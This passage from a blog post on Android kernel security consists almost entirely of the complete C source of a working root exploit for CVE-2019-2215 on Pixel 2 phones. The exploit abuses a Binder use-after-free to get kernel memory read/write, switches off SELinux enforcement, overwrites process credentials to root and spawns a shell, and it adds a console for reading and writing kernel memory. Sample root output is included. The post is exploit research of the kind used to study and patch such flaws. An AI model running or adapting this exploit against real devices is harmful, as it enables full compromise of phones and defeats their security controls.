274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
/*
* cve-2019-2215.c: Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
*
* Based on proof-of-concept by Jann Horn & Maddie Stone of Google Project Zero.
* cf. https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
*
* Description: Demonstration of a kernel memory R/W-only privilege escalation
* attack resulting in a temporary root shell.
*
* Works on Google Pixel 2/Pixel 2 XL (walleye/taimen) devices
* running the QP1A.190711.020 image with kernel version-BuildID
* 4.4.177-g83bee1dc48e8. For this tool to work on other devices or
* kernels affected by the same vulnerability, some offsets need to
* be found and changed.
*
* Also includes a mini debug console from which it is possible to
* explore and modify kernel memory, as well as spawn a shell. Odd!
*
* Usage: Compile for AArch64 and run; all the source is in a single file on
* purpose. Tested with the cross-compiler toolchain in Android NDK r20.
*
* Pass 'debug' as the sole cmdline argument to start the mini debug
* console instead of the privesc routine after kernel R/W is achieved.
*
* Sample output:
*
* taimen:/ $ cd /data/local/tmp
* taimen:/data/local/tmp $ install -m 755 /sdcard/cve-2019-2215 ./
* taimen:/data/local/tmp $ ./cve-2019-2215
* Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
* [+] startup
* [+] find kernel address of current task_struct
* [+] obtain arbitrary kernel memory R/W
* [+] find kernel base address
* [+] bypass SELinux and patch current credentials
* taimen:/data/local/tmp # id
* uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),
* 1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),
* 3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:kernel:s0
* taimen:/data/local/tmp # getenforce
* Permissive
* taimen:/data/local/tmp # exit
* taimen:/data/local/tmp $
*
* <-- snip -->
*
* taimen:/data/local/tmp $ ./cve-2019-2215 debug
* Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
* [+] startup
* [+] find kernel address of current task_struct
* [+] obtain arbitrary kernel memory R/W
* [+] find kernel base address
* launching debug console, enter 'help' for quick help
* debug> print
* ffffff9bad880000 kernel_base
* ffffff9baf8a57d0 init_task
* ffffff9baf8af2c8 init_user_ns
* ffffff9baf8e3780 selinux_enabled
* ffffff9bafc4e4a8 selinux_enforcing
* ffffffe6b2942b80 current
* debug> write ffffff9bafc4e4a8 01 00 00 00
* debug> exit
* taimen:/data/local/tmp $ getenforce
* Enforcing
* taimen:/data/local/tmp $
*
*/

#define _GNU_SOURCE
#include <ctype.h>
#include <err.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <linux/sched.h>
#include <sched.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/un.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

typedef uint8_t u8;
typedef uint32_t u32;
typedef uint64_t u64;

// #include <linux/android/binder.h>
#define BINDER_THREAD_EXIT 0x40046208ul
// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif

/* Data structure definitions as found in the Sep 2019 QP1A.190711.020 build of
* Android 10 for walleye/taimen, kernel version-BuildID 4.4.177-g83bee1dc48e8.
* Verified using `pahole` on a build of the official Android kernel/msm git:
*
* https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-android10
* (tree a4557a647a054b871bdf8e452a014cafa0ae5078)
*
* We leave only the fields in which we're interested, and we're really only
* interested in their offsets; the others_* fields are padding.
*
* (<original type> <offset> <size>)
*/
struct binder_thread {
u8 others_0[160];
u8 wait[24]; /* wait_queue_head_t 160 24 */
u8 others_1[216];
// u8 others_1[224]; /* NOTE: see binder_iovecs below */
} __attribute__((packed)); /* size: 408 in kernel, 400 here */

struct task_struct {
u8 others_0[1312];
u64 mm; /* struct mm_struct * 1312 8 */
u8 others_1[608];
u64 real_cred; /* const struct cred * 1928 8 */
u64 cred; /* const struct cred * 1936 8 */
u8 others_2[1736];
} __attribute__((packed)); /* size: 3680 */

struct mm_struct {
u8 others_0[768];
u64 user_ns; /* struct user_namespace * 768 8 */
u8 others_1[48];
} __attribute__((packed)); /* size: 824 */

struct cred {
u8 others_0[4];
u32 uid; /* kuid_t 4 4 */
u32 gid; /* kgid_t 8 4 */
u32 suid; /* kuid_t 12 4 */
u32 sgid; /* kgid_t 16 4 */
u32 euid; /* kuid_t 20 4 */
u32 egid; /* kgid_t 24 4 */
u32 fsuid; /* kuid_t 28 4 */
u32 fsgid; /* kgid_t 32 4 */
u32 securebits; /* unsigned int 36 4 */
u64 cap_inheritable; /* kernel_cap_t 40 8 */
u64 cap_permitted; /* kernel_cap_t 48 8 */
u64 cap_effective; /* kernel_cap_t 56 8 */
u64 cap_bset; /* kernel_cap_t 64 8 */
u64 cap_ambient; /* kernel_cap_t 72 8 */
u8 others_1[40];
u64 security; /* void * 120 8 */
u8 others_2[40];
} __attribute__((packed)); /* size: 168 */

struct task_security_struct {
u32 osid; /* u32 0 4 */
u32 sid; /* u32 4 4 */
u32 exec_sid; /* u32 8 4 */
u32 create_sid; /* u32 12 4 */
u32 keycreate_sid; /* u32 16 4 */
u32 sockcreate_sid; /* u32 20 4 */
} __attribute__((packed)); /* size: 24 */

/* Kernel symbol table offsets, relative to _head, in the QP1A.190711.020
* walleye/taimen kernel. The SELinux-related offsets were determined with
* reference to System.map and a minor bit of trial-and-error.
*/
const ptrdiff_t ksym_init_task = 0x20257d0;
const ptrdiff_t ksym_init_user_ns = 0x202f2c8;
const ptrdiff_t ksym_selinux_enabled = 0x2063780;
const ptrdiff_t ksym_selinux_enforcing = 0x23ce4a8;

/* The exploit relies upon a use-after-free by the kernel's epoll cleanup code
* resulting from an oversight in Android's Binder IPC subsystem, fixed here:
*
* https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/drivers/android/binder.c?h=linux-4.14.y&id=7a3cee43e935b9d526ad07f20bf005ba7e74d05b
*
* In the original Project Zero POC, arrays of 25 `struct iovec`s are treated
* as `struct binder_thread`s by the kernel. We do the same here via a union,
* which hopefully clarifies where the #defines of 25 and 10 came from in the
* original POC. Since we're using structure definitions for offsets only, we're
* fine cutting off 8 bytes from our definition of a `struct binder_thread` to
* ensure `sizeof(binder_iovecs) == sizeof(struct iovec[25]) == 400`.
*/
const size_t iovs_sz = sizeof(struct binder_thread) / sizeof(struct iovec);
const size_t iov_idx = offsetof(struct binder_thread, wait) / sizeof(struct iovec);
typedef union {
struct binder_thread bt;
struct iovec iovs[iovs_sz];
} binder_iovecs;

void kwrite(u64 kaddr, void *buf, size_t len);
void kread(u64 kaddr, void *buf, size_t len);
void kwrite_u64(u64 kaddr, u64 data);
void kwrite_u32(u64 kaddr, u32 data);
u64 kread_u64(u64 kaddr);
u64 kread_u32(u64 kaddr);

void prepare_globals(void);
void find_current(void);
void obtain_kernel_rw(void);
void find_kernel_base(void);
void patch_creds(void);
void launch_shell(void);
void launch_debug_console(void);

void con_loop(void);
int con_consume(char **token);
int con_parse_hexstring(char *token, u64 *val);
int con_parse_number(char *token, u64 *val);
int con_parse_hexbytes(char **token, u8 **data, size_t *len);
void con_kdump(u64 kaddr, size_t len);

void execute_stage(int op);
void notify_stage_failure(void);

int main(int argc, char *argv[]);

pid_t pid;
int debugging;
void *dummy_page;
int kernel_rw_pipe[2];
int binder_fd;
int epoll_fd;

u64 current;
u64 kernel_base;

void kwrite(u64 kaddr, void *buf, size_t len) {
errno = 0;
if (len > PAGE_SIZE)
errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
if (write(kernel_rw_pipe[1], buf, len) != (ssize_t)len)
err(1, "kwrite failed to load userspace buffer");
if (read(kernel_rw_pipe[0], (void *)kaddr, len) != (ssize_t)len)
err(1, "kwrite failed to overwrite kernel memory");
}
void kread(u64 kaddr, void *buf, size_t len) {
errno = 0;
if (len > PAGE_SIZE)
errx(1, "kernel reads over PAGE_SIZE are messy, tried 0x%lx", len);
if (write(kernel_rw_pipe[1], (void *)kaddr, len) != (ssize_t)len)
err(1, "kread failed to read kernel memory");
if (read(kernel_rw_pipe[0], buf, len) != (ssize_t)len)
err(1, "kread failed to write out to userspace");
}
u64 kread_u64(u64 kaddr) {
u64 data;
kread(kaddr, &data, sizeof(data));
return data;
}
u64 kread_u32(u64 kaddr) {
u32 data;
kread(kaddr, &data, sizeof(data));
return data;
}
void kwrite_u64(u64 kaddr, u64 data) {
kwrite(kaddr, &data, sizeof(data));
}
void kwrite_u32(u64 kaddr, u32 data) {
kwrite(kaddr, &data, sizeof(data));
}

void prepare_globals(void) {
pid = getpid();

struct utsname kernel_info;
if (uname(&kernel_info) == -1)
err(1, "determine kernel release");
if (strcmp(kernel_info.release, "4.4.177-g83bee1dc48e8"))
warnx("kernel version-BuildID is not '4.4.177-g83bee1dc48e8'");

dummy_page = mmap((void *)0x100000000ul, 2 * PAGE_SIZE,
PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (dummy_page != (void *)0x100000000ul)
err(1, "mmap 4g aligned");
if (pipe(kernel_rw_pipe))
err(1, "kernel_rw_pipe");

binder_fd = open("/dev/binder", O_RDONLY);
epoll_fd = epoll_create(1000);
}

void find_current(void) {
/* Originally: void leak_task_struct(void); */
struct epoll_event event = {.events = EPOLLIN};
if (epoll_ctl(epoll_fd, EPOLL_CTL_ADD, binder_fd, &event))
err(1, "epoll_add");

binder_iovecs bio;
memset(&bio, 0, sizeof(bio));
bio.iovs[iov_idx].iov_base = dummy_page; /* spinlock in the low address half must be zero */
bio.iovs[iov_idx].iov_len = PAGE_SIZE; /* wq->task_list->next */
bio.iovs[iov_idx + 1].iov_base = (void *)0xdeadbeef; /* wq->task_list->prev */
bio.iovs[iov_idx + 1].iov_len = PAGE_SIZE;

int pipe_fd[2];
if (pipe(pipe_fd))
err(1, "pipe");
if (fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_SIZE) != PAGE_SIZE)
err(1, "pipe size");
static char page_buffer[PAGE_SIZE];

pid = fork();
if (pid == -1)
err(1, "fork");
if (pid == 0) {
/* Child process */
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
// first page: dummy data
if (read(pipe_fd[0], page_buffer, PAGE_SIZE) != PAGE_SIZE)
err(1, "read full pipe");
close(pipe_fd[1]);
exit(0);
}

ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
ssize_t writev_ret = writev(pipe_fd[1], bio.iovs, iovs_sz);
if (writev_ret != (ssize_t)(2 * PAGE_SIZE))
errx(1, "writev() returns 0x%lx, expected 0x%lx\n",
writev_ret, (ssize_t)(2 * PAGE_SIZE));
// second page: leaked data
if (read(pipe_fd[0], page_buffer, PAGE_SIZE) != PAGE_SIZE)
err(1, "read full pipe");

pid_t status;
if (wait(&status) != pid)
err(1, "wait");

current = *(u64 *)(page_buffer + 0xe8);
}
void obtain_kernel_rw(void) {
/* Originally: void clobber_addr_limit(void); */
struct epoll_event event = {.events = EPOLLIN};
if (epoll_ctl(epoll_fd, EPOLL_CTL_ADD, binder_fd, &event))
err(1, "epoll_add");

binder_iovecs bio;
memset(&bio, 0, sizeof(bio));
bio.iovs[iov_idx].iov_base = dummy_page; /* spinlock in the low address half must be zero */
bio.iovs[iov_idx].iov_len = 1; /* wq->task_list->next */
bio.iovs[iov_idx + 1].iov_base = (void *)0xdeadbeef; /* wq->task_list->prev */
bio.iovs[iov_idx + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
bio.iovs[iov_idx + 2].iov_base = (void *)0xbeefdead;
bio.iovs[iov_idx + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

u64 second_write_chunk[] = {
1, /* iov_len */
0xdeadbeef, /* iov_base (already used) */
0x8 + 2 * 0x10, /* iov_len (already used) */
current + 0x8, /* next iov_base (addr_limit) */
8, /* next iov_len (sizeof(addr_limit)) */
0xfffffffffffffffe /* value to write */
};

int socks[2];
if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks))
err(1, "socketpair");
if (write(socks[1], "X", 1) != 1)
err(1, "write socket dummy byte");

pid = fork();
if (pid == -1)
err(1, "fork");
if (pid == 0) {
/* Child process */
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
size_t write_sz = sizeof(second_write_chunk);
if (write(socks[1], second_write_chunk, write_sz) != (ssize_t)write_sz)
err(1, "write second chunk to socket");
exit(0);
}

ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
struct msghdr msg = {.msg_iov = bio.iovs, .msg_iovlen = iovs_sz};
size_t recvmsg_sz = bio.iovs[iov_idx].iov_len +
bio.iovs[iov_idx + 1].iov_len +
bio.iovs[iov_idx + 2].iov_len;
ssize_t recvmsg_ret = recvmsg(socks[0], &msg, MSG_WAITALL);
if (recvmsg_ret != (ssize_t)recvmsg_sz)
errx(1, "recvmsg() returns %ld, expected %lu\n", recvmsg_ret, recvmsg_sz);

setbuf(stdout, NULL);
}
void find_kernel_base(void) {
u64 current_mm = kread_u64(current + offsetof(struct task_struct, mm));
u64 current_user_ns = kread_u64(current_mm + offsetof(struct mm_struct, user_ns));
kernel_base = current_user_ns - ksym_init_user_ns;
if (kernel_base & 0xffful) {
if (debugging) {
warnx("bad kernel base (not 0x...000)");
kernel_base = 0;
return;
} else {
errx(1, "bad kernel base (not 0x...000)");
}
}

u64 init_task = kernel_base + ksym_init_task;
u64 cred_ptrs[2] = {
kread_u64(init_task + offsetof(struct task_struct, real_cred)), /* init_task.real_cred */
kread_u64(init_task + offsetof(struct task_struct, cred)), /* init_task.cred */
};

/* Examine what we think are the init process' credentials.
* Presumably, these tests are unlikely to pass unless we have the right
* kernel base, kernel symbol offsets, and kernel data structure offsets.
*/
for (int cred_idx = 0; cred_idx < 2; cred_idx++) {
struct cred cred;
kread(cred_ptrs[cred_idx], &cred, sizeof(struct cred));

if (cred.uid || cred.gid || cred.suid || cred.sgid ||
cred.euid || cred.egid || cred.fsuid || cred.fsgid) {
if (debugging) {
warnx("bad kernel base (init_task not where expected)");
kernel_base = 0;
return;
} else {
errx(1, "bad kernel base (init_task not where expected)");
}
}

const u64 cap = 0x3fffffffff;
if (cred.cap_inheritable || cred.cap_permitted != cap ||
cred.cap_effective != cap || cred.cap_bset != cap ||
cred.cap_ambient) {
if (debugging) {
warnx("bad kernel base (init_task not where expected)");
kernel_base = 0;
return;
} else {
errx(1, "bad kernel base (init_task not where expected)");
}
}

/* .real_cred == .cred, probably. */
if (cred_ptrs[0] == cred_ptrs[1])
break;
}
}
void patch_creds(void) {
u64 cred_ptrs[2] = {
kread_u64(current + offsetof(struct task_struct, real_cred)), /* current->real_cred */
kread_u64(current + offsetof(struct task_struct, cred)), /* current->cred */
};

/* Final check: our struct cred(s?) in the kernel should contain our uid. */
if (kread_u32(cred_ptrs[0] + offsetof(struct cred, uid)) != getuid())
errx(1, "bad cred (current->real_cred->uid not our own uid)");
if (cred_ptrs[0] != cred_ptrs[1])
if (kread_u32(cred_ptrs[1] + offsetof(struct cred, uid)) != getuid())
errx(1, "bad cred (current->cred->uid not our own uid)");

/* Just disabling selinux_enforcing should suffice for our purposes. SELinux
* still does MAC (mandatory access control) checks on our actions based on
* our security contexts, but violations are logged, not prevented. Our
* permissions then fall back to DAC (discretionary access control), i.e.
* user accounts/groups. And as we know, the root user is DAC omnipotent.
*/
// kwrite_u32(kernel_base + ksym_selinux_enabled, 0);
kwrite_u32(kernel_base + ksym_selinux_enforcing, 0);

/* Patch our struct cred(s?) in the kernel. */
for (int cred_idx = 0; cred_idx < 2; cred_idx++) {
u64 cred_ptr = cred_ptrs[cred_idx];

/* All 8 (e|f?s)?[ug]id members should be set to 0, making us root. */
kwrite_u32(cred_ptr + offsetof(struct cred, uid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, gid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, suid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, sgid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, euid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, egid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, fsuid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, fsgid), 0);

/* What to do with securebits is not as obvious. The comment for it in
* the kernel source reads 'SUID-less security management'. In the init
* process' cred(s?), this is set to 0, so we might as well do the same.
*/
kwrite_u32(cred_ptr + offsetof(struct cred, securebits), 0);

/* All 5 cap_.+ members should be bitset to all 1's. We will have all
* capability bits set, and our children will be able to inherit them.
*/
kwrite_u64(cred_ptr + offsetof(struct cred, cap_inheritable), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_permitted), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_effective), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_bset), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_ambient), ~(u64)0);

/* Also patch our task_security_struct(s?). This is not necessary with
* SELinux bypassed, but we will again match init's settings and set
* the osid and sid members to 1.
*/
u64 security_ptr = kread_u64(cred_ptr + offsetof(struct cred, security));
kwrite_u32(security_ptr + offsetof(struct task_security_struct, osid), 1);
kwrite_u32(security_ptr + offsetof(struct task_security_struct, sid), 1);

/* .real_cred == .cred, probably. */
if (cred_ptrs[0] == cred_ptrs[1])
break;
}

if (getuid())
errx(1, "did some patching, but our uid is not 0");
}
void launch_shell(void) {
if (execl("/bin/sh", "/bin/sh", (char *)NULL) == -1)
err(1, "launch shell");
}
void launch_debug_console(void) {
printf("launching debug console; enter 'help' for quick help\n");
con_loop();
}

void con_loop(void) {
u64 kaddr;
size_t len;

int running = 1;
while (running) {
printf("debug> ");

char *line = NULL;
size_t getline_buf_len = 0;
if (getline(&line, &getline_buf_len, stdin) == -1)
err(1, "read stdin");
int was_handled = 0;

char *token = strtok(line, " \t\r\n\a");
if (token && !strcmp(token, "print") && con_consume(&token)) {
printf("%lx kernel_base\n", kernel_base);
printf("%lx init_task\n", kernel_base + ksym_init_task);
printf("%lx init_user_ns\n", kernel_base + ksym_init_user_ns);
printf("%lx selinux_enabled\n", kernel_base + ksym_selinux_enabled);
printf("%lx selinux_enforcing\n", kernel_base + ksym_selinux_enforcing);
printf("%lx current\n", current);
was_handled = 1;
} else if (token && !strcmp(token, "read")) {
/* Not that there'd actually be any kmem allocated there, but if the
* read address were 0xffffffffffffffff, we'd technically be able to
* read exactly one byte. We ~do~ want to handle that case... right?
*/
if (con_parse_hexstring(strtok(NULL, " \t\r\n\a"), &kaddr) &&
con_parse_number(strtok(NULL, " \t\r\n\a"), &len) &&
con_consume(&token) && 0 < len && len <= PAGE_SIZE &&
len - 1 <= ~(u64)0 - kaddr) {
con_kdump(kaddr, len);
was_handled = 1;
}
} else if (token && !strcmp(token, "write")) {
u8 *data = NULL;
if (con_parse_hexstring(strtok(NULL, " \t\r\n\a"), &kaddr) &&
con_parse_hexbytes(&token, &data, &len) && 0 < len &&
len <= PAGE_SIZE && len - 1 <= ~(u64)0 - kaddr) {
kwrite(kaddr, data, len);
was_handled = 1;
}
free(data);
} else if (token && !strcmp(token, "shell") && con_consume(&token)) {
pid = fork();
if (pid == -1)
err(1, "fork");
if (pid == 0)
launch_shell();
pid_t status;
do {
waitpid(pid, &status, WUNTRACED);
} while (!WIFEXITED(status) && !WIFSIGNALED(status));
was_handled = 1;
} else if (token && !strcmp(token, "help") && con_consume(&token)) {
printf(
"quick help\n"
" print\n"
" print kernel base address, some kernel symbol offsets,\n"
" and address of current task_struct as hexstrings\n"
" read <kaddr> <len>\n"
" read <len> bytes from <kaddr> and display as a hexdump\n"
" <kaddr> is a hexstring not prefixed with 0x\n"
" <len> is 1-4096 or 0x1-0x1000\n"
" write <kaddr> <data>\n"
" write <data> to <kaddr>\n"
" <kaddr> is a hexstring not prefixed with 0x\n"
" <data> is 1-4096 hexbytes, spaces ignored, to be written *AS-IS*\n"
" e.g. if kaddr 0xffffffffdeadbeef contains an int, and you want to set\n"
" its value to 1, enter 'write ffffffffdeadbeef <data>', where <data> is\n"
" '01000000', '0100 0000', '01 00 0 0 00', etc. (our ARM is little-endian)\n"
" shell\n"
" launch a shell (hint: have we ~somehow~ become another user? :P)\n"
" help\n"
" print this help\n"
" exit\n"
" exit debug console\n");
was_handled = 1;
} else if (token && !strcmp(token, "exit") && con_consume(&token)) {
running = 0;
was_handled = 1;
}

if (!was_handled)
printf("woopz; enter 'help' for quick help\n");

free(line);
}
}
int con_consume(char **token) {
int ret = 1;
do {
if ((*token = strtok(NULL, " \t\r\n\a")))
ret = 0;
} while (*token);
return ret;
}
int con_parse_hexstring(char *token, u64 *val) {
if (!token || !(*token))
return 0;
*val = 0;
while (*token) {
if (*val & 0xf000000000000000)
return 0;
else if ('0' <= *token && *token <= '9')
*val = *val * 16 + *token - '0';
else if ('a' <= *token && *token <= 'f')
*val = *val * 16 + *token - 'a' + 10;
else if ('A' <= *token && *token <= 'F')
*val = *val * 16 + *token - 'A' + 10;
else
return 0;
token++;
}
return 1;
}
int con_parse_number(char *token, u64 *val) {
if (!token || !(*token))
return 0;
if (*token == '0' && (token[1] == 'x' || token[1] == 'X'))
return con_parse_hexstring(token + 2, val);
*val = 0;
while (*token) {
if (*token < '0' || '9' < *token)
return 0;
*val = *val * 10 + *token - '0';
if (*val > PAGE_SIZE)
return 0;
token++;
}
return 1;
}
int con_parse_hexbytes(char **token, u8 **data, size_t *len) {
static char hexbyte[2 + 1] = {'\0'};

u8 *buf = malloc(PAGE_SIZE * sizeof(u8));
if (!buf)
err(1, "allocate memory");

*data = buf;
*len = 0;
int hexbyte_idx = 0;

while ((*token = strtok(NULL, " \t\r\n\a"))) {
for (char *c = *token; *c; c++) {
if (!isxdigit(*c))
return 0;
hexbyte[hexbyte_idx++] = *c;
if (hexbyte_idx == 2) {
hexbyte_idx = 0;
u64 val;
if (*len == PAGE_SIZE || !con_parse_hexstring(hexbyte, &val))
return 0;
buf[(*len)++] = (u8)(val & 0xff);
}
}
}

return *len && !hexbyte_idx;
}
void con_kdump(u64 kaddr, size_t len) {
/* Mimic the output of `xxd`. */
static char line[40 + 1] = {'\0'};
static char text[16 + 1] = {'\0'};

if (!len)
return;

u8 *buf = malloc(len * sizeof(u8));
if (!buf)
err(1, "allocate memory");

kread(kaddr, buf, len);

for (u64 line_offset = 0; line_offset < len; line_offset += 16) {
char *linep = line;
for (size_t i = 0; i < 16; i++) {
if (i + line_offset < len) {
char c = buf[i + line_offset];
linep += sprintf(linep, (i & 1) ? "%02x " : "%02x", c);
text[i] = (' ' <= c && c <= '~') ? c : '.';
} else {
linep += sprintf(linep, (i & 1) ? " " : " ");
text[i] = ' ';
}
}
printf("%016lx: %s %s\n", kaddr + line_offset, line, text);
}

free(buf);
}

/* Excuse this mess; bionic libc doesn't have on_exit(). */
char *stage_desc;
struct stage_t {
void (*func)(void);
char *desc;
};
struct stage_t stages[] = {
{prepare_globals, "startup"},
{find_current, "find kernel address of current task_struct"},
{obtain_kernel_rw, "obtain arbitrary kernel memory R/W"},
{find_kernel_base, "find kernel base address"},
{patch_creds, "bypass SELinux and patch current credentials"},
{launch_shell, NULL},
{launch_debug_console, NULL},
};
void execute_stage(int stage_idx) {
stage_desc = stages[stage_idx].desc;
(*stages[stage_idx].func)();
if (stage_desc && pid && (stage_idx != 3 || kernel_base))
printf("[+] %s\n", stage_desc);
}
void notify_stage_failure(void) {
if (stage_desc && pid)
fprintf(stderr, "[-] %s failed\n", stage_desc);
}

int main(int argc, char *argv[]) {
atexit(notify_stage_failure);
debugging = argc == 2 && !strcmp(argv[1], "debug");

printf("Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215\n");

execute_stage(0); /* prepare_globals() */
execute_stage(1); /* find_current() */
execute_stage(2); /* obtain_kernel_rw() */
execute_stage(3); /* find_kernel_base() */

if (debugging) {
if (!kernel_base) {
notify_stage_failure();
warnx("printed kernel offsets won't be reliable\n");
}
execute_stage(6); /* launch_debug_console() */
} else {
execute_stage(4); /* patch_creds() */
execute_stage(5); /* launch_shell() */
}

return 0;
}

image-20241212112523545

Syzkaller For Android Kernel

please goto 《Syzkaller源码分析及利用》…….

  • Title: Android安全-内核篇
  • Author: 韩乔落
  • Created at : 2024-10-22 15:21:46
  • Updated at : 2025-12-24 15:42:49
  • Link: https://jelasin.github.io/2024/10/22/Android安全-内核篇/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments